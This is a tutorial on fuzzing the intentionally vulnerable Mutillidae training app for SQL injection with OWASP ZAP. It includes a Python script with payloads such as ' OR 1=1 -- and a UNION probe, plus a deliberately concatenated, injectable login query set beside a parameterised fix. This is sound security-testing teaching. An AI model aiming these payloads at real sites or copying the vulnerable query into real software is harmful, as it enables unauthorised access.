A1: SQL Injection Mutillidae Tutorial Using the ZAP Fuzzer

Have you been using ZAP, OWASP's Zed Attack Proxy? It is an intercepting proxy combined with a fuzzer, a vulnerability scanner and many other features that come in handy when you are analysing and testing web, mobile or any other application that uses HTTP as its communication protocol.

Think about the situation in which, as a tester, you need to check every field of an application where a user can enter data that ends up in a database query: done by hand, it is a huge task. Fortunately, OWASP ZAP can be used to test whether an application has such gaps and whether its input validation has actually been implemented effectively, which greatly improves both the speed and the coverage of testing.

Setting up OWASP ZAP with your browser

Before testing can start, you need to set up ZAP and configure your browser to send its traffic through it:

  1. Install and open the application.
  2. Select Tools ➝ Options ➝ Dynamic SSL Certificates and click the ‘Generate’ button.
  3. Accept the ‘Overwrite existing certificate?’ pop-up.
  4. Click the Save button and save the certificate file in a location you will remember.
  5. Now import the certificate into your browser (Firefox is recommended; the menu paths below are Firefox's).
  6. Select Preferences ➝ Advanced ➝ Certificates in your browser.
  7. Select View Certificates ➝ Import and pick the certificate you generated in step 4.
  8. Mark all the trust checkboxes and click OK. Anything that trusts this CA will accept ZAP's interception of HTTPS, so import it only into a browser profile you use for testing.
  9. Once the certificate has been imported, set ZAP as the proxy through which all browser traffic will pass.
  10. Select Preferences ➝ Advanced ➝ Network tab ➝ Settings.
  11. Choose the ‘Manual proxy configuration:’ radio button in the Connection Settings pop-up.
  12. Enter the HTTP proxy details: host localhost, port 8080 (ZAP's default listening port).
  13. Mark the ‘Use this proxy server for all protocols’ checkbox and click OK.
  14. Your browser is now configured.
  15. Go back to OWASP ZAP; you will notice a ‘Sites’ tree in the upper left corner.
  16. Return to your browser and open any web page.
  17. Back in OWASP ZAP, a number of sites will now appear under ‘Sites’.
  18. At this point you can see every site and resource the browser has requested, along with the responses.

Once the browser is configured to use ZAP, open the Mutillidae web app and go to the first module, A1: Injection.

You will see the login page shown below.

Enter any username and password and press Enter, so that ZAP captures a normal login request.

Now go to the ZAP interface and locate this login request in the history.

Next, select the fuzzing variable in the request, which in our case is the value of the username parameter.

Right-click the highlighted value and select Fuzz.

Now you need to select the SQL injection payloads.

Click Add

A new window opens. Select Strings and paste in some SQL injection strings, for example a lone single quote (to provoke a syntax error) and a tautology such as ' OR 1=1 -- (to short-circuit the WHERE clause). One payload per line.

Then click Add, then OK, then Start Fuzzer.

This starts the fuzzer, and the results are shown in the Fuzzer tab, one row per payload with the response code and size.

You can then open a result in the browser and check the response, or use the search option to look for ‘Syntax’ or ‘Error’ in the responses: a database error message echoed back means the payload reached the query unsanitised. Also compare response sizes and status codes, because a successful authentication bypass produces no error at all, only a different page.

When you open such a response in the browser, the effect of the SQL injection is displayed.
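As an added, runnable example that is not part of the original tutorial, the following Python script re-creates offline what the ZAP fuzzer is doing here: it feeds each payload into the username field, keeps the password fixed, and labels each response the way a tester would when reading the results table (database error, authentication bypass, or nothing unusual). The target is a stand-in for Mutillidae's login page backed by an in-memory SQLite table; that is an assumption for the sake of running offline, since Mutillidae itself uses MySQL and its error strings differ. The vulnerable string-concatenated query sits beside a parameterised version so the two fuzzing runs can be compared.

```python
"""Offline re-creation of fuzzing a login form's username field for SQL injection.

Added example, not code from the original page or from Mutillidae/ZAP.
Assumptions: the form posts ``username`` and ``password``; the back end
concatenates them into the query (as the deliberately vulnerable Mutillidae
login does); the database is an in-memory SQLite table standing in for MySQL.
"""
import re
import sqlite3
from typing import Callable, Dict, List

# Constructed payload list, the sort of strings you paste into ZAP's "Strings" dialog.
SQLI_PAYLOADS: List[str] = [
    "'",                                    # lone quote: provokes a syntax error
    "''",                                   # escaped quote: should behave normally
    "' OR '1'='1",                          # tautology without a comment (fails here, see note)
    "' OR 1=1 -- ",                         # tautology plus comment: drops the password check
    "admin' -- ",                           # pick a known user, comment out the rest
    "' UNION SELECT NULL, NULL, NULL -- ",  # column-count probe for UNION extraction
    '" OR ""="',                            # wrong quote type: should behave normally
]

# Error fragments worth searching fuzzer results for (the tutorial suggests
# "Syntax" or "Error"). MySQL variants for Mutillidae, SQLite variants for this stand-in.
ERROR_SIGNATURES = [
    r"You have an error in your SQL syntax",  # MySQL
    r"different number of columns",           # MySQL, mismatched UNION
    r"unrecognized token",                    # SQLite, unterminated quote
    r'near ".*": syntax error',               # SQLite
    r"same number of result columns",         # SQLite, mismatched UNION
]
_ERROR_RE = re.compile("|".join(ERROR_SIGNATURES), re.IGNORECASE)


def classify_response(body: str) -> str:
    """Label one response body: 'sql-error', 'auth-bypass' or 'normal'."""
    if _ERROR_RE.search(body):
        return "sql-error"
    if "Logged in as" in body:
        return "auth-bypass"
    return "normal"


class FakeMutillidae:
    """Stand-in for the vulnerable login page, backed by in-memory SQLite (constructed data)."""

    def __init__(self) -> None:
        self.db = sqlite3.connect(":memory:")
        self.db.execute(
            "CREATE TABLE accounts (cid INTEGER PRIMARY KEY, username TEXT, password TEXT)"
        )
        self.db.executemany(
            "INSERT INTO accounts (username, password) VALUES (?, ?)",
            [("admin", "adminpass"), ("jeremy", "password")],
        )

    def login_vulnerable(self, username: str, password: str) -> str:
        # Deliberately vulnerable: user input is concatenated straight into the SQL text.
        query = (
            "SELECT username FROM accounts WHERE username='" + username
            + "' AND password='" + password + "'"
        )
        try:
            rows = self.db.execute(query).fetchall()
        except sqlite3.Error as exc:
            # Echoing the error and query back is what makes error-based detection work.
            return f"<p>Error executing query: {exc}</p><pre>{query}</pre>"
        if rows:
            return f"<p>Logged in as {rows[0][0]}</p>"
        return "<p>Authentication Error: Bad user name or password</p>"

    def login_safe(self, username: str, password: str) -> str:
        # Hardened form: bound parameters, so the input can never become SQL syntax.
        rows = self.db.execute(
            "SELECT username FROM accounts WHERE username=? AND password=?",
            (username, password),
        ).fetchall()
        if rows:
            return f"<p>Logged in as {rows[0][0]}</p>"
        return "<p>Authentication Error: Bad user name or password</p>"


def fuzz_username(send: Callable[[str, str], str],
                  payloads: List[str] = SQLI_PAYLOADS) -> Dict[str, str]:
    """Fuzz the username field with every payload at a fixed password.
    Returns {payload: classification}, i.e. the fuzzer's results table."""
    return {p: classify_response(send(p, "x")) for p in payloads}


def interesting(results: Dict[str, str]) -> List[str]:
    """Payloads whose response differs from the normal failed-login baseline."""
    return [p for p, label in results.items() if label != "normal"]


if __name__ == "__main__":
    app = FakeMutillidae()
    for name, handler in (("vulnerable", app.login_vulnerable), ("parameterised", app.login_safe)):
        results = fuzz_username(handler)
        print(f"{name}: {len(interesting(results))} of {len(results)} payloads stood out")
        for p in interesting(results):
            print(f"  {p!r:40} -> {results[p]}")
```

Against the vulnerable handler the lone quote and the three-column UNION probe come back as database errors, while ' OR 1=1 -- and admin' -- log in without a password; ' OR '1'='1 does nothing, because AND binds tighter than OR and the password check still applies, which is exactly why the commented variant is the one to keep in your payload list. Against the parameterised handler every payload is just a failed login, so the difference between the two runs is the finding. Replacing the handler with a function that POSTs to the real form through the ZAP proxy turns the same loop into a live fuzzer.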
